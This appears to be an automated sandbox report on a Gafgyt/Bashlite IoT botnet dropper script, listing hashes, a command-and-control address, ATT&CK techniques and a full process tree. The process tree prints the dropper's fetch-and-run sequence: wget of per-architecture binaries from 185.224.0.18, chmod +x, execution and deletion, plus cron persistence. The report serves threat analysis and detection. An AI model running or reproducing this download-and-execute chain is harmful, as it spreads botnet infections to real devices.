gafgyt | 32e82081fe66e5f77000ecc3fde85384723a93ab7b242f39de6621d5959d38bf

Analysis

max time kernel
14s
max time network
129s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
26/02/2025, 16:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

skid.sh
Size

1KB
MD5

b748ad8311eb181303f9c59d1efd764f
SHA1

e3da904334e7ed388ef2ccca048c7a0e50e4332b
SHA256

32e82081fe66e5f77000ecc3fde85384723a93ab7b242f39de6621d5959d38bf
SHA512

b34853c0dac00b278c10e3019751634603099ce87125824a278e90d978560449ffc34c6af404134928be3d413979934d61aa5003fe1f826f980c2908449c7da5

Score

10^/10

gafgyt botnet defense_evasion discovery execution persistence privilege_escalation

Malware Config

Extracted

Family

gafgyt

185.224.0.18:1111

Signatures

Detected Gafgyt variant 2 IoCs

resource	yara_rule
behavioral1/files/fstream-1.dat	family_gafgyt
behavioral1/files/fstream-4.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 8 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1573	chmod
1578	chmod
1583	chmod
1588	chmod
1510	chmod
1515	chmod
1520	chmod
1568	chmod

Executes dropped EXE 41 IoCs

ioc	pid	Process
/tmp/filexZSvKR	1522	skid.x86
/tmp/filezAlEEw	1523	filexZSvKR
/tmp/fileCxG8MQ	1524	filezAlEEw
/tmp/filemkOjV2	1525	fileCxG8MQ
/tmp/file9w1fhs	1526	filemkOjV2
/tmp/file8A10yO	1527	file9w1fhs
/tmp/fileYzmfO3	1528	file8A10yO
/tmp/filez2EwYo	1529	fileYzmfO3
/tmp/filem7c6NN	1530	filez2EwYo
/tmp/file8V0F51	1531	filem7c6NN
/tmp/filelc7GCo	1532	file8V0F51
/tmp/fileos0msO	1533	filelc7GCo
/tmp/filedODZ66	1534	fileos0msO
/tmp/filez7fGPk	1535	filedODZ66
/tmp/fileKJrmAL	1536	filez7fGPk
/tmp/filerbcNz7	1537	fileKJrmAL
/tmp/fileLCiUkk	1538	filerbcNz7
/tmp/fileA7UqGK	1539	fileLCiUkk
/tmp/fileBIyk25	1540	fileA7UqGK
/tmp/filePzhTDn	1541	fileBIyk25
/tmp/fileeasv3J	1542	filePzhTDn
/tmp/filefv8z46	1543	fileeasv3J
/tmp/filek8Li2h	1544	filefv8z46
/tmp/fileih7yvo	1545	filek8Li2h
/tmp/fileTb4MaE	1546	fileih7yvo
/tmp/filewtyE0T	1547	fileTb4MaE
/tmp/fileBa7Ek8	1548	filewtyE0T
/tmp/fileEOmw3m	1549	fileBa7Ek8
/tmp/fileQTTGhw	1550	fileEOmw3m
/tmp/fileVd0F0L	1551	fileQTTGhw
/tmp/fileSQJ4K0	1552	fileVd0F0L
/tmp/fileRbta6e	1553	fileSQJ4K0
/tmp/file6QeTyu	1554	fileRbta6e
/tmp/filekAGRrB	1555	file6QeTyu
/tmp/fileBttDKP	1556	filekAGRrB
/tmp/fileEw3VlA	1560	Process not Found
/tmp/fileZzAgeQ	1561	fileEw3VlA
/tmp/filekLCyR4	1562	fileZzAgeQ
/tmp/filePQX4Lk	1563	filekLCyR4
/tmp/fileCASmPz	1564	filePQX4Lk
/tmp/fileqmgN0B	1565	fileCASmPz

Creates/modifies Cron job 1 TTPs 41 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalation

Cron

T1053.003

description	ioc	Process
File opened for modification	/etc/cron.hourly/0	fileCASmPz
File opened for modification	/etc/cron.hourly/0	filezAlEEw
File opened for modification	/etc/cron.hourly/0	file8A10yO
File opened for modification	/etc/cron.hourly/0	fileA7UqGK
File opened for modification	/etc/cron.hourly/0	filePzhTDn
File opened for modification	/etc/cron.hourly/0	filefv8z46
File opened for modification	/etc/cron.hourly/0	filek8Li2h
File opened for modification	/etc/cron.hourly/0	filelc7GCo
File opened for modification	/etc/cron.hourly/0	fileBIyk25
File opened for modification	/etc/cron.hourly/0	fileeasv3J
File opened for modification	/etc/cron.hourly/0	fileih7yvo
File opened for modification	/etc/cron.hourly/0	fileQTTGhw
File opened for modification	/etc/cron.hourly/0	fileVd0F0L
File opened for modification	/etc/cron.hourly/0	filePQX4Lk
File opened for modification	/etc/cron.hourly/0	filemkOjV2
File opened for modification	/etc/cron.hourly/0	file8V0F51
File opened for modification	/etc/cron.hourly/0	fileKJrmAL
File opened for modification	/etc/cron.hourly/0	filewtyE0T
File opened for modification	/etc/cron.hourly/0	fileSQJ4K0
File opened for modification	/etc/cron.hourly/0	filekAGRrB
File opened for modification	/etc/cron.hourly/0	fileZzAgeQ
File opened for modification	/etc/cron.hourly/0	fileBa7Ek8
File opened for modification	/etc/cron.hourly/0	fileEOmw3m
File opened for modification	/etc/cron.hourly/0	fileBttDKP
File opened for modification	/etc/cron.hourly/0	fileEw3VlA
File opened for modification	/etc/cron.hourly/0	filekLCyR4
File opened for modification	/etc/cron.hourly/0	skid.x86
File opened for modification	/etc/cron.hourly/0	fileYzmfO3
File opened for modification	/etc/cron.hourly/0	filez2EwYo
File opened for modification	/etc/cron.hourly/0	filedODZ66
File opened for modification	/etc/cron.hourly/0	filerbcNz7
File opened for modification	/etc/cron.hourly/0	fileCxG8MQ
File opened for modification	/etc/cron.hourly/0	file9w1fhs
File opened for modification	/etc/cron.hourly/0	filem7c6NN
File opened for modification	/etc/cron.hourly/0	filez7fGPk
File opened for modification	/etc/cron.hourly/0	fileLCiUkk
File opened for modification	/etc/cron.hourly/0	fileTb4MaE
File opened for modification	/etc/cron.hourly/0	filexZSvKR
File opened for modification	/etc/cron.hourly/0	fileos0msO
File opened for modification	/etc/cron.hourly/0	fileRbta6e
File opened for modification	/etc/cron.hourly/0	file6QeTyu

Writes file to system bin folder 1 IoCs

description	ioc	Process
File opened for modification	/bin/ls	skid.x86

Reads runtime system information 42 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/self/exe	filelc7GCo
File opened for reading	/proc/self/exe	filerbcNz7
File opened for reading	/proc/self/exe	fileBttDKP
File opened for reading	/proc/self/exe	fileqmgN0B
File opened for reading	/proc/self/exe	filem7c6NN
File opened for reading	/proc/self/exe	fileBIyk25
File opened for reading	/proc/self/exe	filePzhTDn
File opened for reading	/proc/self/exe	filez2EwYo
File opened for reading	/proc/self/exe	file8V0F51
File opened for reading	/proc/self/exe	fileKJrmAL
File opened for reading	/proc/self/exe	fileZzAgeQ
File opened for reading	/proc/self/exe	fileCASmPz
File opened for reading	/proc/self/exe	fileCxG8MQ
File opened for reading	/proc/self/exe	fileBa7Ek8
File opened for reading	/proc/self/exe	fileTb4MaE
File opened for reading	/proc/self/exe	fileos0msO
File opened for reading	/proc/self/exe	fileA7UqGK
File opened for reading	/proc/self/exe	fileeasv3J
File opened for reading	/proc/self/exe	filefv8z46
File opened for reading	/proc/self/exe	fileVd0F0L
File opened for reading	/proc/self/exe	fileSQJ4K0
File opened for reading	/proc/self/exe	filekAGRrB
File opened for reading	/proc/self/exe	filezAlEEw
File opened for reading	/proc/self/exe	file8A10yO
File opened for reading	/proc/self/exe	fileLCiUkk
File opened for reading	/proc/self/exe	filewtyE0T
File opened for reading	/proc/self/exe	fileQTTGhw
File opened for reading	/proc/self/exe	file6QeTyu
File opened for reading	/proc/self/exe	filekLCyR4
File opened for reading	/proc/self/exe	filePQX4Lk
File opened for reading	/proc/self/exe	filez7fGPk
File opened for reading	/proc/self/exe	fileih7yvo
File opened for reading	/proc/self/exe	fileRbta6e
File opened for reading	/proc/self/exe	fileEw3VlA
File opened for reading	/proc/self/exe	filemkOjV2
File opened for reading	/proc/self/exe	file9w1fhs
File opened for reading	/proc/self/exe	fileYzmfO3
File opened for reading	/proc/self/exe	filedODZ66
File opened for reading	/proc/self/exe	filek8Li2h
File opened for reading	/proc/self/exe	fileEOmw3m
File opened for reading	/proc/self/exe	skid.x86
File opened for reading	/proc/self/exe	filexZSvKR

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1505	wget
1511	skid.mips
1513	rm

Writes file to tmp directory 50 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/fileBa7Ek8	filewtyE0T
File opened for modification	/tmp/filePQX4Lk	filekLCyR4
File opened for modification	/tmp/skid.sparc	wget
File opened for modification	/tmp/skid.arm5	wget
File opened for modification	/tmp/fileA7UqGK	fileLCiUkk
File opened for modification	/tmp/filem7c6NN	filez2EwYo
File opened for modification	/tmp/skid.mpsl	wget
File opened for modification	/tmp/file9w1fhs	filemkOjV2
File opened for modification	/tmp/fileWyp754	fileBttDKP
File opened for modification	/tmp/fileCASmPz	filePQX4Lk
File opened for modification	/tmp/skid.arm4	wget
File opened for modification	/tmp/skid.mips	wget
File opened for modification	/tmp/filez2EwYo	fileYzmfO3
File opened for modification	/tmp/fileih7yvo	filek8Li2h
File opened for modification	/tmp/filewtyE0T	fileTb4MaE
File opened for modification	/tmp/fileZzAgeQ	fileEw3VlA
File opened for modification	/tmp/filefJn8jV	fileqmgN0B
File opened for modification	/tmp/filexZSvKR	skid.x86
File opened for modification	/tmp/filez7fGPk	filedODZ66
File opened for modification	/tmp/fileeasv3J	filePzhTDn
File opened for modification	/tmp/filek8Li2h	filefv8z46
File opened for modification	/tmp/fileSQJ4K0	fileVd0F0L
File opened for modification	/tmp/fileBIyk25	fileA7UqGK
File opened for modification	/tmp/fileVd0F0L	fileQTTGhw
File opened for modification	/tmp/fileqmgN0B	fileCASmPz
File opened for modification	/tmp/file8V0F51	filem7c6NN
File opened for modification	/tmp/skid.x86	wget
File opened for modification	/tmp/filezAlEEw	filexZSvKR
File opened for modification	/tmp/fileCxG8MQ	filezAlEEw
File opened for modification	/tmp/filemkOjV2	fileCxG8MQ
File opened for modification	/tmp/fileEOmw3m	fileBa7Ek8
File opened for modification	/tmp/fileRbta6e	fileSQJ4K0
File opened for modification	/tmp/filekAGRrB	file6QeTyu
File opened for modification	/tmp/fileKJrmAL	filez7fGPk
File opened for modification	/tmp/filerbcNz7	fileKJrmAL
File opened for modification	/tmp/fileBttDKP	filekAGRrB
File opened for modification	/tmp/filekLCyR4	fileZzAgeQ
File opened for modification	/tmp/skid.ppc	wget
File opened for modification	/tmp/skid.arm6	wget
File opened for modification	/tmp/filelc7GCo	file8V0F51
File opened for modification	/tmp/file8A10yO	file9w1fhs
File opened for modification	/tmp/fileos0msO	filelc7GCo
File opened for modification	/tmp/filedODZ66	fileos0msO
File opened for modification	/tmp/filefv8z46	fileeasv3J
File opened for modification	/tmp/fileTb4MaE	fileih7yvo
File opened for modification	/tmp/fileQTTGhw	fileEOmw3m
File opened for modification	/tmp/file6QeTyu	fileRbta6e
File opened for modification	/tmp/fileYzmfO3	file8A10yO
File opened for modification	/tmp/fileLCiUkk	filerbcNz7
File opened for modification	/tmp/filePzhTDn	fileBIyk25

/tmp/skid.sh
/tmp/skid.sh
1⤵
PID:1504
- /usr/bin/wget
  wget http://185.224.0.18/skid.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1505
- /bin/chmod
  chmod +x skid.mips
  2⤵
  - File and Directory Permissions Modification
  PID:1510
- /tmp/skid.mips
  ./skid.mips
  2⤵
  - System Network Configuration Discovery
  PID:1511
- /bin/rm
  rm -rf skid.mips
  2⤵
  - System Network Configuration Discovery
  PID:1513
- /usr/bin/wget
  wget http://185.224.0.18/skid.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1514
- /bin/chmod
  chmod +x skid.mpsl
  2⤵
  - File and Directory Permissions Modification
  PID:1515
- /tmp/skid.mpsl
  ./skid.mpsl
  2⤵
  PID:1516
- /bin/rm
  rm -rf skid.mpsl
  2⤵
  PID:1518
- /usr/bin/wget
  wget http://185.224.0.18/skid.x86
  2⤵
  - Writes file to tmp directory
  PID:1519
- /bin/chmod
  chmod +x skid.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1520
- /tmp/skid.x86
  ./skid.x86
  2⤵
  - Executes dropped EXE
  - Creates/modifies Cron job
  - Writes file to system bin folder
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1521
- - /tmp/filexZSvKR
    ./skid.x86
    3⤵
    - Executes dropped EXE
    - Creates/modifies Cron job
    - Reads runtime system information
    - Writes file to tmp directory
    PID:1522
  - - /tmp/filezAlEEw
      ./skid.x86
      4⤵
      Executes dropped EXE
      Creates/modifies Cron job
      Reads runtime system information
      Writes file to tmp directory
      PID:1523
    - - /tmp/fileCxG8MQ
        
        ./skid.x86
        5⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1524
      - /tmp/filemkOjV2
        
        ./skid.x86
        6⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1525
        
        /tmp/file9w1fhs
        
        ./skid.x86
        7⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1526
        
        /tmp/file8A10yO
        
        ./skid.x86
        8⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1527
        
        /tmp/fileYzmfO3
        
        ./skid.x86
        9⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1528
        
        /tmp/filez2EwYo
        
        ./skid.x86
        10⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1529
        
        /tmp/filem7c6NN
        
        ./skid.x86
        11⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1530
        
        /tmp/file8V0F51
        
        ./skid.x86
        12⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1531
        
        /tmp/filelc7GCo
        
        ./skid.x86
        13⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1532
        
        /tmp/fileos0msO
        
        ./skid.x86
        14⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1533
        
        /tmp/filedODZ66
        
        ./skid.x86
        15⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1534
        
        /tmp/filez7fGPk
        
        ./skid.x86
        16⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1535
        
        /tmp/fileKJrmAL
        
        ./skid.x86
        17⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1536
        
        /tmp/filerbcNz7
        
        ./skid.x86
        18⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1537
        
        /tmp/fileLCiUkk
        
        ./skid.x86
        19⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1538
        
        /tmp/fileA7UqGK
        
        ./skid.x86
        20⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1539
        
        /tmp/fileBIyk25
        
        ./skid.x86
        21⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1540
        
        /tmp/filePzhTDn
        
        ./skid.x86
        22⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1541
        
        /tmp/fileeasv3J
        
        ./skid.x86
        23⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1542
        
        /tmp/filefv8z46
        
        ./skid.x86
        24⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1543
        
        /tmp/filek8Li2h
        
        ./skid.x86
        25⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1544
        
        /tmp/fileih7yvo
        
        ./skid.x86
        26⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1545
        
        /tmp/fileTb4MaE
        
        ./skid.x86
        27⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1546
        
        /tmp/filewtyE0T
        
        ./skid.x86
        28⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1547
        
        /tmp/fileBa7Ek8
        
        ./skid.x86
        29⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1548
        
        /tmp/fileEOmw3m
        
        ./skid.x86
        30⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1549
        
        /tmp/fileQTTGhw
        
        ./skid.x86
        31⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1550
        
        /tmp/fileVd0F0L
        
        ./skid.x86
        32⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1551
        
        /tmp/fileSQJ4K0
        
        ./skid.x86
        33⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1552
        
        /tmp/fileRbta6e
        
        ./skid.x86
        34⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1553
        
        /tmp/file6QeTyu
        
        ./skid.x86
        35⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1554
        
        /tmp/filekAGRrB
        
        ./skid.x86
        36⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1555
        
        /tmp/fileBttDKP
        
        ./skid.x86
        37⤵
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1556
- /bin/rm
  rm -rf skid.x86
  2⤵
  PID:1566
- /usr/bin/wget
  wget http://185.224.0.18/skid.ppc
  2⤵
  - Writes file to tmp directory
  PID:1567
- /bin/chmod
  chmod +x skid.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:1568
- /tmp/skid.ppc
  ./skid.ppc
  2⤵
  PID:1569
- /bin/rm
  rm -rf skid.ppc
  2⤵
  PID:1571
- /usr/bin/wget
  wget http://185.224.0.18/skid.sparc
  2⤵
  - Writes file to tmp directory
  PID:1572
- /bin/chmod
  chmod +x skid.sparc
  2⤵
  - File and Directory Permissions Modification
  PID:1573
- /tmp/skid.sparc
  ./skid.sparc
  2⤵
  PID:1574
- /bin/rm
  rm -rf skid.sparc
  2⤵
  PID:1576
- /usr/bin/wget
  wget http://185.224.0.18/skid.arm4
  2⤵
  - Writes file to tmp directory
  PID:1577
- /bin/chmod
  chmod +x skid.arm4
  2⤵
  - File and Directory Permissions Modification
  PID:1578
- /tmp/skid.arm4
  ./skid.arm4
  2⤵
  PID:1579
- /bin/rm
  rm -rf skid.arm4
  2⤵
  PID:1581
- /usr/bin/wget
  wget http://185.224.0.18/skid.arm5
  2⤵
  - Writes file to tmp directory
  PID:1582
- /bin/chmod
  chmod +x skid.arm5
  2⤵
  - File and Directory Permissions Modification
  PID:1583
- /tmp/skid.arm5
  ./skid.arm5
  2⤵
  PID:1584
- /bin/rm
  rm -rf skid.arm5
  2⤵
  PID:1586
- /usr/bin/wget
  wget http://185.224.0.18/skid.arm6
  2⤵
  - Writes file to tmp directory
  PID:1587
- /bin/chmod
  chmod +x skid.arm6
  2⤵
  - File and Directory Permissions Modification
  PID:1588
- /tmp/skid.arm6
  ./skid.arm6
  2⤵
  PID:1589
- /bin/rm
  rm -rf skid.arm6
  2⤵
  PID:1591

/tmp/fileEw3VlA
./skid.x86
1⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Reads runtime system information
- Writes file to tmp directory
PID:1560
- /tmp/fileZzAgeQ
  ./skid.x86
  2⤵
  - Executes dropped EXE
  - Creates/modifies Cron job
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1561
- - /tmp/filekLCyR4
    ./skid.x86
    3⤵
    - Executes dropped EXE
    - Creates/modifies Cron job
    - Reads runtime system information
    - Writes file to tmp directory
    PID:1562
  - - /tmp/filePQX4Lk
      ./skid.x86
      4⤵
      Executes dropped EXE
      Creates/modifies Cron job
      Reads runtime system information
      Writes file to tmp directory
      PID:1563
    - - /tmp/fileCASmPz
        
        ./skid.x86
        5⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1564
      - /tmp/fileqmgN0B
        
        ./skid.x86
        6⤵
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1565

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/cron.hourly/0

Filesize
92B

MD5
3f006f7f81fc17be7f4a0d3da0fad5de

SHA1
97a94d3d0654c6551057af3809b52572bd7f9f5d

SHA256
982f9e0f089b91ba79df723435099df15c72e1201a45010ee60226ab136c93bf

SHA512
97d2ac0057427b940ada7c0fc805c1966e2535c3c3767ca85fef4a7e0fdc9d4ef9eb133530408b1e439df067881cb317e948ad9bfd487e958a04c97d9db978e0

Download Submit
/tmp/filexZSvKR

Filesize
90KB

MD5
4bc8168b8c378af3bfae2f24d97b9b6c

SHA1
fd44443b2cd003a2f730f1dc7a9d6fb0e5839eab

SHA256
6a55b599795d69cb14091be61447efef93b8b809904a2955f893c4424158b74e

SHA512
1c69ba6d6f12cf52bcfa0e2df1845a4ef29a5cb488e56869350ef78ad3b18cd7ac2a3dce6c7701c03d7a2aebb3f59a1977b8191fe655db847d831b160b6338bf

Download Submit
/tmp/filexZSvKR

Filesize
98KB

MD5
85f9548e1bd7afd130a1e2b851b41da8

SHA1
75c285684ec3964eb9bf3f4122e48c38f0ae11b8

SHA256
c8e23dad72cec959fc3a9fd530bf839ca04bb3f7e433364e5aabf62160ee4da9

SHA512
3f072cbf2ce940eecccb22eecfded787fd29f7a0828c6732c679a1769399ca7611d2ea201cbf37994efa40b0a2136aba50c8d760ed1e4f283a64f173ba23a576

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads